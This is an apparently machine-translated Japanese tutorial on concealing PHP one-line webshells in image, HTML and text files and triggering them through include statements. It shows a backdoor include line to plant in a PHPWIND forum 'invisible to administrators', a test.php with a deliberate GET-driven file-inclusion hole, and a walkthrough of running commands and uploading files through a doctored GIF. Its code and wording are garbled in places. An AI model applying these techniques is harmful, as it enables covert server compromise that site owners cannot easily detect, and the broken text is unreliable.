最近、多くの友人が、私の一文のトロイの木馬を HTML や画像に隠すことができるか尋ねてきました。実際、HTML ファイルや画像に一文のトロイの木馬を挿入することは、すでにかなり隠されています。 , このテストレポートを読み続けてみましょう。
PHP は拡張子 php を持つファイルのみを解析するため、PHP ステートメントをイメージに挿入しただけでは実行されないことを知っておく必要があります。したがって、画像に隠された PHP ステートメントを実行できる必要があります。 PHP の呼び出し関数 (include、require など) を使用するだけです。
数日前にトロイの木馬を写真に隠すという記事をまだ覚えています。つまり、PHP ファイル内で include("x.gif") などのステートメントを使用して、画像に隠されたトロイの木馬ステートメントを呼び出します。 ASP のステートメントも同様です。非常に隠されているように見えますが、イメージを直接呼び出すと、PHP について少し知っている人であれば、不審な点を見つけるのは難しくありません。 URL の GET メソッドではパラメータを渡すことが難しいため、トロイの木馬挿入のパフォーマンスを最大限に活用できません。
PHPではinclude関数が頻繁に使われるため、セキュリティ上の問題が多すぎます。例えば、PHPWIND1.36の脆弱性は、includeの背後にある変数のフィルタリングが不足していることが原因です。これから、同様のステートメントを構築して PHP ファイルに挿入できます。次に、トロイの木馬を画像または HTML ファイルに隠します。これは、より隠蔽性が高いと言えます。たとえば、PHPWIND フォーラムに次のステートメントを挿入します。
<「?」 @include include/.$PHPWIND_ROOT;? >
一般管理者は見ることができません。
インクルード関数の助けを借りて、txt、html、画像ファイルなどのさまざまな種類のファイルに PHP トロイの木馬を隠すことができます。 txt、html、画像ファイルの 3 種類のファイルはフォーラムや記事システムで最も一般的であるため、以下の順序でテストを実行します。
まず、PHP ファイル test.php を作成します。ファイルの内容は次のとおりです。
$test=$_GET[テスト]; @include test/.$test
? >
HTMLファイルの場合、通常はテンプレートファイルです。 HTML ファイルに挿入されたトロイの木馬を表示せずに呼び出して実行できるようにするには、次のように HTML に隠し属性を持つテキスト ボックスを追加します。 その後、上記と同じ方法を使用します。実行によって返される結果は、通常、ソース ファイルを表示することで確認できます。 たとえば、このプログラムのディレクトリを表示する機能を使用します。 C:Uniserver2_7swww est としてディレクトリを取得できるので、ソース ファイルの内容を表示します。
次に、写真ファイルについて話しましょう。最も有害な手口は、写真にトロイの木馬を隠すことです。写真を直接編集して、写真の最後に挿入することができます
テスト後、通常は画像に影響はありません。次に、同じ方法でクライアントのトロイの木馬アドレスを追加します
PHPの環境変数を確認すると、返される結果は元の画像です。
実際にはコマンドは実行されましたが、返された結果は実際の GIF ファイルなので表示されません。コマンドを実行した後、ファイルのアップロード コマンドを実行します。予想どおり、ファイルはサーバーに正常にアップロードされました。このような偽造の利点は、それがよく隠蔽されることです。言うまでもなく、欠点は応答がないことです。返された結果を確認したい場合は、メモ帳を取り出して偽の画像ファイルを作成します。